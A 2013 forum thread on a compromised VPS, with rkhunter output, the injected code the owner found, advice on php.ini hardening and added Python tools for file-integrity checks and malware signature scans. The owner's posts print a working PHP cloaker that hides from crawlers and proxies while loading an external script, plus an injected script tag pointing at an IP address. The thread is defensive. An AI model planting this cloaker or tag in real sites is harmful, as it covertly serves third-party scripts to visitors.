MRatWork Forum by Mustafa Ramadhan

General Discussions => GNU/Linux Helps => Topic started by: costa1988sv on 2013-02-24, 04:14:06

Title: Security Problems
Post by: costa1988sv on 2013-02-24, 04:14:06
Someone is modifying files and the MySQL database on my VPS. The first time it modified files and stopped, then the MySQL database, and now files again. I changed the password and switched to Kloxo-MR, but it is not fixed. Can he do that from my PHP script?

[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter version...
  This version  : 1.4.0
  Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter data files...
  Checking file mirrors.dat                             [ No update ]
  Checking file programs_bad.dat                        [ No update ]
  Checking file backdoorports.dat                       [ No update ]
  Checking file suspscan.dat                            [ No update ]
  Checking file i18n/cn                                 [ No update ]
  Checking file i18n/de                                 [ No update ]
  Checking file i18n/en                                 [ No update ]
  Checking file i18n/zh                                 [ No update ]
  Checking file i18n/zh.utf8                            [ No update ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
         File: /etc/rkhunter.conf
         Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
         Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
         Current size: 37361    Stored size: 37357
         Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
         Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
         /proc/modules output:
         lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
         SSH configuration option 'PermitRootLogin': yes
         Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
         /dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.
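The "file properties have changed" warning in the rkhunter output above is rkhunter comparing a stored hash, size and mtime against the current file. The same kind of check, aimed at a web root, is what makes the repeated edits to included files visible between scans. The block below is an added example, not rkhunter's code and not from the post; the directory layout, file names, the 203.0.113.10 address and the injected content it builds are all constructed for the demo.

```python
"""File-properties baseline for a web root, modelled on rkhunter's "file
properties have changed" warning.  Added example, not rkhunter's code and not
from the forum post; the web root, file names and injected content below are
constructed for the demo.
"""
import hashlib
import json
import os
import tempfile


def file_properties(path):
    """Record what rkhunter stores per file: SHA-1 hash, size and mtime."""
    digest = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    st = os.stat(path)
    return {"hash": digest.hexdigest(), "size": st.st_size, "mtime": int(st.st_mtime)}


def snapshot(root):
    """Properties of every regular file under root, keyed by relative path."""
    props = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                props[os.path.relpath(full, root)] = file_properties(full)
    return props


def save_baseline(props, baseline_file):
    """Write the baseline somewhere the web server user cannot modify it."""
    with open(baseline_file, "w") as fh:
        json.dump(props, fh, indent=1, sort_keys=True)


def load_baseline(baseline_file):
    with open(baseline_file) as fh:
        return json.load(fh)


def compare(stored, current):
    """Return one record per difference.  A dropped web shell shows up as
    'added'; an include file with an appended script tag as 'modified'."""
    changes = []
    for rel, cur in sorted(current.items()):
        old = stored.get(rel)
        if old is None:
            changes.append({"file": rel, "kind": "added", "current": cur})
        elif old["hash"] != cur["hash"] or old["size"] != cur["size"]:
            changes.append({"file": rel, "kind": "modified", "stored": old, "current": cur})
    for rel in sorted(set(stored) - set(current)):
        changes.append({"file": rel, "kind": "removed", "stored": stored[rel]})
    return changes


def format_change(change):
    """Render a change in the shape rkhunter used in the post above."""
    lines = ["Warning: The file properties have changed (%s):" % change["kind"],
             "         File: %s" % change["file"]]
    if change["kind"] == "modified":
        old, cur = change["stored"], change["current"]
        lines += ["         Current hash: %s" % cur["hash"],
                  "         Stored hash : %s" % old["hash"],
                  "         Current size: %d    Stored size: %d" % (cur["size"], old["size"]),
                  "         Current file modification time: %d" % cur["mtime"],
                  "         Stored file modification time : %d" % old["mtime"]]
    return "\n".join(lines)


def demo():
    """Constructed scenario: baseline a tiny web root, then tamper with it the
    way the post describes (script tag appended to an included text file, a
    new PHP file dropped in) and return what compare() reports."""
    work = tempfile.mkdtemp()
    root = os.path.join(work, "www")
    os.makedirs(root)
    with open(os.path.join(root, "footer.txt"), "w") as fh:
        fh.write("<p>footer</p>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php include 'footer.txt';\n")
    baseline_file = os.path.join(work, "baseline.json")   # kept outside the web root
    save_baseline(snapshot(root), baseline_file)

    # Tampering, constructed to mirror the post (host is a documentation address).
    with open(os.path.join(root, "footer.txt"), "a") as fh:
        fh.write('<script type="text/javascript" src="http://203.0.113.10/js/x.php"></script>\n')
    with open(os.path.join(root, "cache.php"), "w") as fh:
        fh.write("<?php error_reporting(0);\n")

    return compare(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    for change in demo():
        print(format_change(change))
```

Run the snapshot once after a known-clean deploy and again from cron; the baseline file must live outside the web root and be owned by a user other than the one PHP runs as, otherwise whoever can write the PHP files can rewrite the baseline too.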
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 09:25:52
Can you attach here the files with the warnings 'Bourne-Again shell script text executable' and 'perl script text executable'?

I want to compare them with my own systems.

Better to update your Kloxo-MR and then report your system here by running 'sh /script/sysfo'.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-24, 17:17:01
sh /script/sysfo
sh: /script/sysfo: No such file or directory
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 17:26:46
You need to update to the latest Kloxo-MR version if '/script/sysinfo' is not found.
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 17:41:55
Looks like the content of ifdown and the other files is the same as on my servers.

It's a 'false positive'.
Title: Re: Security Problems
Post by: Spacedust on 2013-02-24, 20:01:14
Yes, got the same. Just look for rootkits.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-24, 20:18:09
The rootkit scan was clean.
How do I update?
Current Version:   6.5.0.c.2013021802
Title: Re: Security Problems
Post by: MRatWork on 2013-02-24, 20:25:10
Quote from: "costa1988sv"
The rootkit scan was clean.
How do I update?
Current Version:   6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644 (http://forum.mratwork.com/viewtopic.php?f=4&t=644)
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 05:34:44
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
   1. MySQL: mysql-5.0.96-1
   2. PHP: php53u-5.3.21-1.ius.el5
   3. Httpd: httpd-2.2.23-3.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: nginx-1.3.13-1.el5
   6. Qmail: qmail-1.03-1.5.15

D. Php-type (for Httpd/proxy): php-fpm_worker

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2048        805       1242          0          0          0
   -/+ buffers/cache:        805       1242
   Swap:            0          0          0

I installed the new version and I get random 500 errors and a content encoding error.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 05:54:53
Switched to event and no more errors.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 07:02:48
In top I have 15+ /usr/libexec/courier-authlib/authdaemond processes.

My script is 200% faster, but WordPress is 25% slower.
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 07:39:34
Quote from: "costa1988sv"
In top I have 15+ /usr/libexec/courier-authlib/authdaemond processes.

My script is 200% faster, but WordPress is 25% slower.
It's not 'Security Problems'.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 18:40:00
Today he modified a text file that I use with include.
He added at the end:
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 18:46:02
And in PHP files:
Code:
error_reporting(0);
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);
if(strlen($_SERVER['HTTP_REFERER']))
{
    $referer = parse_url($_SERVER['HTTP_REFERER']);
    $referer['host'] = str_replace("www.", "", strtolower($referer['host']));

}
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222"  , "125" ,
"202"  , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
 "87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
 "164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
if (  $_SERVER['HTTP_X_FORWARDED_FOR']
   || $_SERVER['HTTP_X_FORWARDED']
   || $_SERVER['HTTP_FORWARDED_FOR']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED']
   || $_SERVER['HTTP_VIA']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED_FOR_IP']
   || $_SERVER['VIA']
   || $_SERVER['X_FORWARDED_FOR']
   || $_SERVER['FORWARDED_FOR']
   || $_SERVER['X_FORWARDED']
   || $_SERVER['FORWARDED']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['FORWARDED_FOR_IP']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['HTTP_PROXY_CONNECTION'])
{
 echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){
if (in_array($ip222, $iptarget)) {
echo "";
 } elseif (in_array($useragent111, $ugtarget)){
echo "";

} elseif (!in_array($referer['host'], $rfbad)){
//echo "<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>";
//echo "<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>";
echo "<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>";
}
}
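The two injections shown in the last two posts have a recognisable shape: a script tag whose src is a bare IP address, and a PHP "cloaker" that stays silent for proxied requests, listed IP prefixes and crawler user agents, and only emits the external script to everyone else. The scanner below looks for exactly those building blocks. It is an added example, not code from the post or from Kloxo-MR; the sample files, the 203.0.113.10 address and the example.invalid host in it are constructed.

```python
"""Signature scan for the two injections shown in the thread: a <script> tag
whose src points at a bare IP address, and the PHP "cloaker" that hides the
injected script from proxies, search-engine crawlers and listed IP ranges.
Added example, not from the post; the sample files below are constructed.
"""
import re

# A script tag loading from an IPv4 literal rather than a hostname.
SCRIPT_IP_TAG = re.compile(
    r"""<script[^>]*\bsrc\s*=\s*["']https?://(\d{1,3}(?:\.\d{1,3}){3})(/[^"']*)?["']""",
    re.IGNORECASE)

# Building blocks of the injected PHP from the post; each is weak on its own,
# several together in one file is the signature.
CLOAKER_MARKERS = {
    "silenced errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "reads user agent": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "first octets of client IP": re.compile(
        r"substr\s*\(\s*\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]\s*,\s*0\s*,\s*2\s*\)"),
    "proxy header check": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_X_FORWARDED_FOR['\"]\s*\]"),
    "crawler UA in list": re.compile(r"Googlebot|Mediapartners-Google"),
    "echoes external script": re.compile(r"echo\s+[\"']<script"),
}
CLOAKER_THRESHOLD = 3


def find_script_ip_tags(text):
    """Return [(line_no, ip, path)] for every script tag loading from an IP."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in SCRIPT_IP_TAG.finditer(line):
            hits.append((n, m.group(1), m.group(2) or "/"))
    return hits


def cloaker_markers(text):
    """Names of the cloaker building blocks present in text, in table order."""
    return [name for name, rx in CLOAKER_MARKERS.items() if rx.search(text)]


def scan_file(name, text):
    """Findings for one file as (file, severity, description) tuples."""
    findings = []
    for n, ip, path in find_script_ip_tags(text):
        findings.append((name, "high", "line %d: script loaded from IP %s%s" % (n, ip, path)))
    markers = cloaker_markers(text)
    if len(markers) >= CLOAKER_THRESHOLD:
        findings.append((name, "high", "cloaker pattern (%d markers: %s)"
                         % (len(markers), ", ".join(markers))))
    elif markers:
        findings.append((name, "low", "partial cloaker markers: %s" % ", ".join(markers)))
    return findings


# Constructed samples: a clean file, an included text file with the appended
# tag, and a PHP file carrying a shortened form of the cloaker from the post.
SAMPLES = {
    "header.php": "<?php\n$title = 'Home';\nif (strlen($_SERVER['HTTP_REFERER'])) { /* ok */ }\n",
    "footer.txt": '<p>footer</p>\n<script type="text/javascript" src="http://203.0.113.10/js/linkbucks.php"></script>\n',
    "index.php": (
        "<?php\nerror_reporting(0);\n"
        "$useragent111 = $_SERVER['HTTP_USER_AGENT'];\n"
        "$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);\n"
        "if ($_SERVER['HTTP_X_FORWARDED_FOR'] || $_SERVER['HTTP_VIA']) { echo ''; }\n"
        "elseif (!in_array($ip222, $iptarget)) { echo \"<script src='http://example.invalid/h1.js'></script>\"; }\n"
    ),
}


def scan_samples(samples=SAMPLES):
    """Run scan_file over every sample, in name order, and return all findings."""
    return [f for name in sorted(samples) for f in scan_file(name, samples[name])]


if __name__ == "__main__":
    for finding in scan_samples():
        print("%-12s %-4s %s" % finding)
```

To use it on a real tree, walk the web root and call scan_file on every .php, .txt, .html and .js file; the "low" findings are worth a look but the script tag and the three-or-more-markers cloaker are the ones to act on. Because the cloaker shows nothing to proxied requests and to the listed user agents, checking the site through a proxy or with a crawler UA does not prove it is clean, which is why a file-based scan is the useful check here.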
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 18:46:39
Questions:

1. Did you install Kloxo-MR with a fresh install or update from Kloxo Official?
2. Is the attack by the hacker on all domains or just a certain domain?
3. What app (WordPress, etcetera) is on the domain that was attacked?
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 19:29:20
So, you mean you updated from Kloxo to Kloxo-MR?

If it is only 1 domain, or more than one domain but still one user, that means something is wrong with the app code.
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 19:35:57
I upgraded to Kloxo-MR from Kloxo.
Last night I updated Kloxo-MR.
The other domains are not too popular. How can he modify files from a script? curl, fopen?
Title: Re: Security Problems
Post by: MRatWork on 2013-02-25, 19:41:43
I will move your thread to 'GNU/Linux Helps' because this thread is not related to Kloxo-MR but to your PHP code.

Possibly he has a 'backdoor' on your website and/or your code is not good.

Usually it is enough to disable functions for 'exec,passthru,shell_exec,system,proc_open,popen,show_source' (default from Kloxo-MR).
Title: Re: Security Problems
Post by: costa1988sv on 2013-02-25, 20:12:17
I've disabled allow_url_fopen and allow_url_include.
Thank you for your help, I will install a fresh Kloxo-MR when the backup works.
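The thread converges on two php.ini changes: the disable_functions list that Kloxo-MR ships by default, and allow_url_fopen / allow_url_include turned off so PHP code cannot fetch or include remote URLs. The audit below checks a php.ini for exactly those settings. It is an added example, not Kloxo-MR's code or anything from the posts; the two ini fragments it tests are constructed.

```python
"""Audit a php.ini for the hardening the thread settles on: the
disable_functions list that Kloxo-MR ships by default plus allow_url_fopen and
allow_url_include turned off.  Added example, not Kloxo-MR's code; the two ini
fragments below are constructed.
"""

# The list quoted in the thread as the Kloxo-MR default.
REQUIRED_DISABLED = {"exec", "passthru", "shell_exec", "system",
                     "proc_open", "popen", "show_source"}
MUST_BE_OFF = ("allow_url_fopen", "allow_url_include")


def parse_php_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments and
    [sections] ignored.  Later assignments override earlier ones, as in PHP."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_is_on(value):
    """PHP treats on/yes/true/1 as enabled and off/no/false/0/"" as disabled."""
    return value is not None and value.strip().lower() in ("on", "yes", "true", "1")


def audit(text):
    """Return (setting, problem) pairs; an empty list means every check passed."""
    s = parse_php_ini(text)
    problems = []
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        problems.append(("disable_functions", "not disabled: " + ", ".join(missing)))
    for key in MUST_BE_OFF:
        if key not in s:
            problems.append((key, "not set, relying on the compiled-in default"))
        elif ini_is_on(s[key]):
            problems.append((key, "is On"))
    return problems


# Constructed fragments: a stock-looking ini and the hardened one.
WEAK_INI = """; constructed: stock-looking settings
[PHP]
allow_url_fopen = On
allow_url_include = Off
disable_functions =
"""

HARDENED_INI = """; constructed: the settings the thread converges on
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,show_source
"""


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(ini) or "ok")
```

With php-fpm, as used on this server, a pool's `php_admin_value[disable_functions]` and `php_admin_flag[allow_url_fopen]` lines apply on top of php.ini, so the pool configuration files need the same audit, and `php -i` or a phpinfo() page shows the values that are actually in effect. Note also that disabling these functions limits what injected PHP can do on the host; it does not stop the attacker from editing files if they already have write access through a backdoor or a vulnerable upload path, which is why MRatWork's questions about which domain and which app were hit are the ones that lead to the root cause.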